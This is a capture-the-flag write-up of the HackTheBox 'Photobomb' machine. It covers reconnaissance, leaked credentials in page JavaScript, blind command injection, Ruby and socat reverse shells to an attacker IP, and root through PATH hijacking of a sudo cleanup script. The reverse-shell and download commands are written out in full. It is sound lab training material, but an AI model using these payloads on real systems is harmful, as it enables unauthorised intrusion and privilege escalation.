# Hackthebox - Photobomb ![Photobomb](https://1679624655-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEkk28J0B2BeDMuesRMr1%2Fuploads%2Fgit-blob-8f0c65dd1b1f09d580ed9c8cae225b74fae59fcd%2Fhtb-photobomb.png?alt=media) ## Nmap ```bash ┌──(kali㉿kali)-[~] └─$ sudo nmap -T4 -sC -sV -O -Pn -p- 10.10.11.182 [sudo] password for kali: Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-24 09:06 EST Nmap scan report for 10.10.11.182 Host is up (0.028s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 e22473bbfbdf5cb520b66876748ab58d (RSA) | 256 04e3ac6e184e1b7effac4fe39dd21bae (ECDSA) |_ 256 20e05d8cba71f08c3a1819f24011d29e (ED25519) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-title: Did not follow redirect to http://photobomb.htb/ |_http-server-header: nginx/1.18.0 (Ubuntu) No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.93%E=4%D=12/24%OT=22%CT=1%CU=33794%PV=Y%DS=2%DC=I%G=Y%TM=63A707 OS:99%P=x86_64-pc-linux-gnu)SEQ(SP=FD%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)OPS OS:(O1=M539ST11NW7%O2=M539ST11NW7%O3=M539NNT11NW7%O4=M539ST11NW7%O5=M539ST1 OS:1NW7%O6=M539ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN OS:(R=Y%DF=Y%T=40%W=FAF0%O=M539NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N% OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD OS:=S) Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 44.92 seconds ``` * We need to add a line to our `/etc/hosts/` file like this `10.10.11.182 photobomb.htb` ## Port 80 * When browsing to we end up here\ ![Landing page](https://1679624655-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEkk28J0B2BeDMuesRMr1%2Fuploads%2Fgit-blob-c3ed39ff1b8a9b2d3ff628b48430d7fe3c0639ae%2F2022-12-24-09-12-28.png?alt=media) * Clicking on the link will open a prompt to login * Looking at the code we find this ```javascript function init() { // Jameson: pre-populate creds for tech support as they keep forgetting them and emailing me if (document.cookie.match(/^(.*;)?\s*isPhotoBombTechSupport\s*=\s*[^;]+(.*)?$/)) { document.getElementsByClassName('creds')[0].setAttribute('href','http://pH0t0:b0Mb!@photobomb.htb/printer'); } } window.onload = init; ``` * Great we have credentials `pH0t0:b0Mb!` using these we are able to login ![after login](https://1679624655-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEkk28J0B2BeDMuesRMr1%2Fuploads%2Fgit-blob-6d30b55294e2e9a34a2470377fe18f4da656faa8%2F2022-12-24-09-25-17.png?alt=media) ### Gobuster * Nothing here. Most endpoints give this 404 page. ![Sinatra](https://1679624655-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEkk28J0B2BeDMuesRMr1%2Fuploads%2Fgit-blob-335bdbc9c39912a7d0bc661a3c5a78a6186bea3c%2F2022-12-24-09-28-47.png?alt=media) * Here is the code of the page ```html
Try this: 
get '/printers' do
  "Hello World"
end
``` * We can note here the presence of [Sinatra](https://sinatrarb.com/), and keep it aside for later. * Let's play a little with the download feature * Photobomb kinda reminds me about zipbomb (the attack) but we do not have an upload form at the moment. * It seems like we should focus on injection or path traversal vulnerabilities. * Let's use burp intruder for some fuzzing. Looking at the results, we get some interesting backtrace. * See the results here ![intruder](https://1679624655-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEkk28J0B2BeDMuesRMr1%2Fuploads%2Fgit-blob-6f43ebf68903dfea6cfcf57f39186046474587d8%2F2022-12-24-10-51-49.png?alt=media) * See the backtrace we get ![backtrace](https://1679624655-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEkk28J0B2BeDMuesRMr1%2Fuploads%2Fgit-blob-ba3213cf70e00fbd661360816790a6a7ce10fc3f%2F2022-12-24-10-53-32.png?alt=media) * Trying out a wget in the filtype parameter in a server on my kali does something. Doing a whoami however won't work because we do not get the output as it is blind command injection. * We start a local webserver `python3 -m http.server 80` * We launch a wget through burp repeater. It has to be url encoded, we can do it easily with burp inspector or ctr+U ![wget in burp](https://1679624655-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEkk28J0B2BeDMuesRMr1%2Fuploads%2Fgit-blob-8bfe807f9a26f049fd69339c735dae0c5c973a49%2F2022-12-24-12-18-44.png?alt=media) * We can see that it works ![request from target](https://1679624655-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEkk28J0B2BeDMuesRMr1%2Fuploads%2Fgit-blob-e59a858c408c195bbbea82ac973c6c90724ae837%2F2022-12-24-12-20-30.png?alt=media) * Using this we could launch a reverse shell * Our [usual bash commands](https://csbygb.gitbook.io/pentips/linux/useful#launch-shells-from-a-terminal) are not successful. * This one in ruby looses the connection right away `ruby -rsocket -e'f=TCPSocket.open("10.10.14.2",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'` * [Payload all the things](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#ruby) has another option for us `ruby -rsocket -e'exit if fork;c=TCPSocket.new("10.10.14.2","4444");loop{c.gets.chomp!;(exit! if $_=="exit");($_=~/cd (.+)/i?(Dir.chdir($1)):(IO.popen($_,?r){|io|c.print io.read}))rescue c.puts "failed: #{$_}"}'`\ This one does not die on us and we get a shell!\ ![shell](https://1679624655-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEkk28J0B2BeDMuesRMr1%2Fuploads%2Fgit-blob-12b5f9ea38fd46c6f4f206ce50b0971795fc8a02%2F2022-12-24-14-11-39.png?alt=media) * We are the user wizard. Let's grab the user flag ## Privilege escalation * Let's get a better shell with a socat binary * `wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O socat` from your kali * Then we put on our python web server `python3 -m http.server 80` * We also set up a listener with socat ```bash socat file:`tty`,raw,echo=0 tcp-listen:4445 ``` Then we go to a writable directory `wget http://10.10.14.2/socat` * `chmod +x socat` * ./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.14.2:4445\` * We get a more decent shell this way ![socat](https://1679624655-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEkk28J0B2BeDMuesRMr1%2Fuploads%2Fgit-blob-1eaa41d13382601cca82b6c035bb9db4b803ca41%2F2022-12-24-14-48-08.png?alt=media) ### Linepeas * We take linpeas and launch it * Interesting input to investigate further ```bash */5 * * * * sudo /opt/cleanup.sh ``` * There is an interesting cronjob. * Here is the content of `/opt/cleanup.sh` ```bash #!/bin/bash . /opt/.bashrc cd /home/wizard/photobomb # clean up log files if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ] then /bin/cat log/photobomb.log > log/photobomb.log.old /usr/bin/truncate -s0 log/photobomb.log fi # protect the priceless originals find source_images -type f -name '*.jpg' -exec chown root:root {} \; ``` * Also we can set the env for /opt/cleanup.sh and run it without the root password. See `sudo -l` result here ```bash wizard@photobomb:~/photobomb$ sudo -l Matching Defaults entries for wizard on photobomb: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User wizard may run the following commands on photobomb: (root) SETENV: NOPASSWD: /opt/cleanup.sh ``` * The cleanup script uses the find command. We could make our own find command and change the path. > INSIDER TIP: Don't do like me do not forget to chmod +x your malicious find script... -\_-' * So here is the process * Create your own malicious find command. Here is mine (it will lauch root shell but you could also make a reverse shell for example) ```bash #!/bin/bash bash ``` * Get it in your target (you can also write your script from the target with echo) `wget http://10.10.14.2/find` * Make your script executable `chmod +x find` * Set the path `sudo PATH=/home/wizard/photobomb:$PATH /opt/cleanup.sh` this way the find command will be fetch where you want here in the photobomb folder * You should be root in a very few seconds We can grab the root flag